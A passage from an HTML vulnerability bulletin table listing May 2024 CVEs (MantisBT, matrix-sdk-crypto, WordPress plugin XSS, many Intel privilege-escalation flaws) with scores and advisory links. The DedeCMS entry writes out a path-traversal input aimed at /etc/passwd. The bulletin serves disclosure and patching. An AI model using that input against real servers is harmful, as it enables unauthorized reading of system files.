<td>MantisBT (Mantis Bug Tracker) is an open source issue tracker. If an issue references a note that belongs to another issue that the user doesn't have access to, then it gets hyperlinked. Clicking on the link gives an access denied error as expected, yet some information remains available via the link, link label, and tooltip. This can result in disclosure of the existence of the note, the note author name, the note creation timestamp, and the issue id the note belongs to. Version 2.26.2 contains a patch for the issue. No known workarounds are available.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34080&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34080" target="_blank">CVE-2024-34080</a><br><a href="https://github.com/mantisbt/mantisbt/commit/0a50562369d823689c9b946066d1e49d3c2df226" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/mantisbt/mantisbt/pull/2000" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/mantisbt/mantisbt/security/advisories/GHSA-99jc-wqmr-ff2q" target="_blank">security-advisories@github.com</a><br><a href="https://mantisbt.org/bugs/view.php?id=34434" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>matrix-org--matrix-sdk-crypto<br> </td>
<td>The matrix-sdk-crypto crate, part of the Matrix Rust SDK project, is an implementation of a Matrix end-to-end encryption state machine in Rust. In Matrix, the server-side `key backup` stores encrypted copies of Matrix message keys. This facilitates key sharing between a user's devices and provides a redundant copy in case all devices are lost. The key backup uses asymmetric cryptography, with each server-side key backup assigned a unique public-private key pair. Due to a logic bug introduced in commit 71136e44c03c79f80d6d1a2446673bc4d53a2067, matrix-sdk-crypto version 0.7.0 will sometimes log the private part of the backup key pair to Rust debug logs (using the `tracing` crate). This issue has been resolved in matrix-sdk-crypto version 0.7.1. No known workarounds are available.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34353&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">5.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34353" target="_blank">CVE-2024-34353</a><br><a href="https://crates.io/crates/matrix-sdk-crypto/0.7.1" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/matrix-org/matrix-rust-sdk/commit/71136e44c03c79f80d6d1a2446673bc4d53a2067" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/matrix-org/matrix-rust-sdk/commit/fa10bbb5dd0f9120a51aa1854cec752e25790bb0" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/matrix-org/matrix-rust-sdk/releases/tag/matrix-sdk-crypto-0.7.1" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/matrix-org/matrix-rust-sdk/security/advisories/GHSA-9ggc-845v-gcgv" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>matter-labs--era-compiler-solidity<br> </td>
<td>era-compiler-solidity is the ZKsync compiler for Solidity. The problem occurred during instruction selection in the `DAGCombine` phase while visiting the XOR operation. The issue arises when attempting to fold the expression `!(x cc y)` into `(x !cc y)`. To perform this transformation, the second operand of XOR should be a constant representing the true value. However, it was incorrectly assumed that -1 represents the true value, when in fact, 1 is the correct representation, so this transformation for this case should be skipped. This vulnerability is fixed in 1.4.1.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34704&amp;vector=CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N" target="_blank" title="CVSS V3 Score">5.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34704" target="_blank">CVE-2024-34704</a><br><a href="https://github.com/matter-labs/era-compiler-solidity/security/advisories/GHSA-22pj-7cvw-r3gc" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>mgibbs189--Custom Field Suite<br> </td>
<td>The Custom Field Suite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'cfs[fields][*][name]' parameter in all versions up to, and including, 2.6.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3068&amp;vector=CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">4.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3068" target="_blank">CVE-2024-3068</a><br><a href="https://plugins.trac.wordpress.org/browser/custom-field-suite/trunk/templates/field_html.php?order=date&amp;desc=1#L46" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;new=3080330%40custom-field-suite%2Ftrunk&amp;old=3042177%40custom-field-suite%2Ftrunk&amp;sfp_email=&amp;sfph_mail=" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0ab546cc-b099-4d26-bf42-785952fcfd8c?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>mihdan--Mihdan: Yandex Turbo Feed<br> </td>
<td>The Mihdan: Yandex Turbo Feed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.6.5.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4411&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4411" target="_blank">CVE-2024-4411</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;new=3081039%40mihdan-yandex-turbo-feed%2Ftrunk&amp;old=3005548%40mihdan-yandex-turbo-feed%2Ftrunk&amp;sfp_email=&amp;sfph_mail=" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6ecf99ef-f879-426f-8a05-129be77f1157?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>miraheze--CreateWiki<br> </td>
<td>CreateWiki is Miraheze's MediaWiki extension for requesting &amp; creating wikis. It is possible for users to be considered as the requester of a specific wiki request if their local user ID on any wiki in a wiki farm matches the local ID of the requester at the wiki where the wiki request was made. This allows them to go to that request entry's on Special:RequestWikiQueue on the wiki where their local user ID matches and take any actions that the wiki requester is allowed to take from there. Commit 02e0f298f8d35155c39aa74193cb7b867432c5b8 fixes the issue. Important note about the fix: This vulnerability has been fixed by disabling access to the REST API and special pages outside of the wiki configured as the "global wiki" in `$wgCreateWikiGlobalWiki` in a user's MediaWiki settings. As a workaround, it is possible to disable the special pages outside of one's own global wiki by doing something similar to `miraheze/mw-config` commit e5664995fbb8644f9a80b450b4326194f20f9ddc that is adapted to one's own setup. As for the REST API, before the fix, there wasn't any REST endpoint that allowed one to make writes. Regardless, it is possible to also disable it outside of the global wiki by using `$wgCreateWikiDisableRESTAPI` and `$wgConf` in the configuration for one's own wiki farm..</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34701&amp;vector=CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N" target="_blank" title="CVSS V3 Score">5.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34701" target="_blank">CVE-2024-34701</a><br><a href="https://github.com/miraheze/CreateWiki/commit/02e0f298f8d35155c39aa74193cb7b867432c5b8" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/miraheze/CreateWiki/security/advisories/GHSA-89fx-77w7-rc64" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/miraheze/mw-config/commit/1798e53901a202b62edab32f8bcd5c6b9e574191" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/miraheze/mw-config/commit/e5664995fbb8644f9a80b450b4326194f20f9ddc" target="_blank">security-advisories@github.com</a><br><a href="https://issue-tracker.miraheze.org/T12011" target="_blank">security-advisories@github.com</a><br><a href="https://issue-tracker.miraheze.org/T12102" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>monetizemore--Advanced Ads  Ad Manager &amp; AdSense<br> </td>
<td>The Advanced Ads - Ad Manager &amp; AdSense plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Advanced Ad widget in all versions up to, and including, 1.52.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3952&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3952" target="_blank">CVE-2024-3952</a><br><a href="https://plugins.trac.wordpress.org/browser/advanced-ads/tags/1.52.1/modules/gutenberg/includes/class-gutenberg.php#L224" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;old=3081914%40advanced-ads&amp;new=3081914%40advanced-ads&amp;sfp_email=&amp;sfph_mail=#file4" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4ea634b5-72db-428c-96b4-15ef6025ab1d?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>mra13--Simple Membership<br> </td>
<td>The Simple Membership plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'swpm_paypal_subscription_cancel_link' shortcode in all versions up to, and including, 4.4.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4383&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4383" target="_blank">CVE-2024-4383</a><br><a href="https://plugins.trac.wordpress.org/browser/simple-membership/tags/4.4.3/classes/shortcode-related/class.swpm-shortcodes-handler.php#L228" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3081024/simple-membership/trunk/classes/shortcode-related/class.swpm-shortcodes-handler.php?old=3010737&amp;old_path=%2Fsimple-membership%2Ftrunk%2Fclasses%2Fshortcode-related%2Fclass.swpm-shortcodes-handler.php" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/56fdbf80-8ea2-412a-b166-b7c27de88e70?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>n/a--DedeCMS<br> </td>
<td>A vulnerability classified as problematic has been found in DedeCMS 5.7.114. This affects an unknown part of the file /sys_verifies.php?action=view. The manipulation of the argument filename with the input ../../../../../etc/passwd leads to path traversal: '../filedir'. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263889 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4790&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4790" target="_blank">CVE-2024-4790</a><br><a href="https://github.com/gatsby2003/DedeCms/blob/main/Directory_traversal_arbitrary_file_read.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263889" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263889" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.329483" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>n/a--Emlog Pro<br> </td>
<td>A vulnerability was found in Emlog Pro 2.3.4 and classified as critical. Affected by this issue is some unknown functionality of the file admin/setting.php. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264740. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-5043&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">4.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-5043" target="_blank">CVE-2024-5043</a><br><a href="https://github.com/ssteveez/emlog/blob/main/emlog%20pro%20version%202.3.4%20Admin%20side%20can%20upload%20arbitrary%20files%20and%20getshell.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264740" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264740" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.331854" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>n/a--Endurance Gaming Mode software installers<br> </td>
<td>Incorrect default permissions in some Endurance Gaming Mode software installers before version 1.3.937.0 may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-42433&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-42433" target="_blank">CVE-2023-42433</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00965.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Advisor software<br> </td>
<td>Uncontrolled search path in some Intel(R) Advisor software before version 2024.0 may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-21772&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-21772" target="_blank">CVE-2024-21772</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01047.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) BIOS PPAM firmware<br> </td>
<td>Improper conditions check in some Intel(R) BIOS PPAM firmware may allow a privileged user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-28383&amp;vector=CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:L/I:H/A:N" target="_blank" title="CVSS V3 Score">6.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-28383" target="_blank">CVE-2023-28383</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00814.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) CST software<br> </td>
<td>Uncontrolled search path for some Intel(R) CST software before version 2.1.10300 may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-40155&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-40155" target="_blank">CVE-2023-40155</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01021.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) CST software<br> </td>
<td>Improper access control for some Intel(R) CST software before version 2.1.10300 may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-39433&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L" target="_blank" title="CVSS V3 Score">4.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-39433" target="_blank">CVE-2023-39433</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01021.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) CST software<br> </td>
<td>Null pointer dereference for some Intel(R) CST software before version 2.1.10300 may allow an authenticated user to potentially enable denial of service via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-41082&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L" target="_blank" title="CVSS V3 Score">4.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-41082" target="_blank">CVE-2023-41082</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01021.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) CST<br> </td>
<td>Improper access control in some Intel(R) CST before version 2.1.10300 may allow an authenticated user to potentially enable denial of service via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-43487&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">4.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-43487" target="_blank">CVE-2023-43487</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01021.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Chipset Device Software<br> </td>
<td>Uncontrolled search path for some Intel(R) Chipset Device Software before version 10.1.19444.8378 may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-21814&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-21814" target="_blank">CVE-2024-21814</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01032.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Computing Improvement Program software<br> </td>
<td>Uncontrolled search path for some Intel(R) Computing Improvement Program software before version 2.4.0.10654 may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-21843&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-21843" target="_blank">CVE-2024-21843</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01059.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Core(TM) Ultra Processors<br> </td>
<td>Sequence of processor instructions leads to unexpected behavior in Intel(R) Core(TM) Ultra Processors may allow an authenticated user to potentially enable denial of service via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-46103&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">4.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-46103" target="_blank">CVE-2023-46103</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01052.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) DLB driver software<br> </td>
<td>Improper input validation for some Intel(R) DLB driver software before version 8.5.0 may allow an authenticated user to potentially denial of service via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-22015&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-22015" target="_blank">CVE-2024-22015</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00996.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) DSA and Intel(R) IAA for some Intel(R) 4th or 5th generation Xeon(R) processors<br> </td>
<td>Hardware logic with insecure de-synchronization in Intel(R) DSA and Intel(R) IAA for some Intel(R) 4th or 5th generation Xeon(R) processors may allow an authorized user to potentially enable denial of service via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-21823&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:N/I:L/A:H" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-21823" target="_blank">CVE-2024-21823</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01084.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) DSA software uninstallers<br> </td>
<td>Uncontrolled search path in some Intel(R) DSA software uninstallers before version 23.4.39.10 may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-45743&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-45743" target="_blank">CVE-2023-45743</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01031.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Data Center GPU Max Series 1100 and 1550 products<br> </td>
<td>Improper conditions check in the Intel(R) Data Center GPU Max Series 1100 and 1550 products may allow an privileged user to potentially enable denial of service via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-47165&amp;vector=CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-47165" target="_blank">CVE-2023-47165</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01041.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Distribution for GDB software<br> </td>
<td>Uncontrolled search path for some Intel(R) Distribution for GDB software before version 2024.0 may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-21841&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-21841" target="_blank">CVE-2024-21841</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01042.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Ethernet Controller Administrative Tools software<br> </td>
<td>Improper access control in some Intel(R) Ethernet Controller Administrative Tools software before version 28.3 may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-21828&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-21828" target="_blank">CVE-2024-21828</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01056.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) FPGA products<br> </td>
<td>Out of bounds write in firmware for some Intel(R) FPGA products before version 2.9.0 may allow escalation of privilege and information disclosure.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-49614&amp;vector=CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N" target="_blank" title="CVSS V3 Score">5.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-49614" target="_blank">CVE-2023-49614</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01050.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) FPGA products<br> </td>
<td>Improper input validation in firmware for some Intel(R) FPGA products before version 2.9.1 may allow denial of service.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-22390&amp;vector=CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">4.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-22390" target="_blank">CVE-2024-22390</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01050.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) GPA Framework software<br> </td>
<td>Uncontrolled search path in some Intel(R) GPA Framework software before version 2023.3 may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-35192&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-35192" target="_blank">CVE-2023-35192</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00831.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) GPA Framework software<br> </td>
<td>Uncontrolled search path in some Intel(R) GPA Framework software before version 2023.4 may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-21861&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-21861" target="_blank">CVE-2024-21861</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01067.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) GPA software<br> </td>
<td>Uncontrolled search path in some Intel(R) GPA software before version 2023.3 may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-41961&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-41961" target="_blank">CVE-2023-41961</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00831.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) GPA software<br> </td>
<td>Uncontrolled search path in some Intel(R) GPA software before version 2023.4 may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-21788&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-21788" target="_blank">CVE-2024-21788</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01067.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Graphics Windows DCH driver software<br> </td>
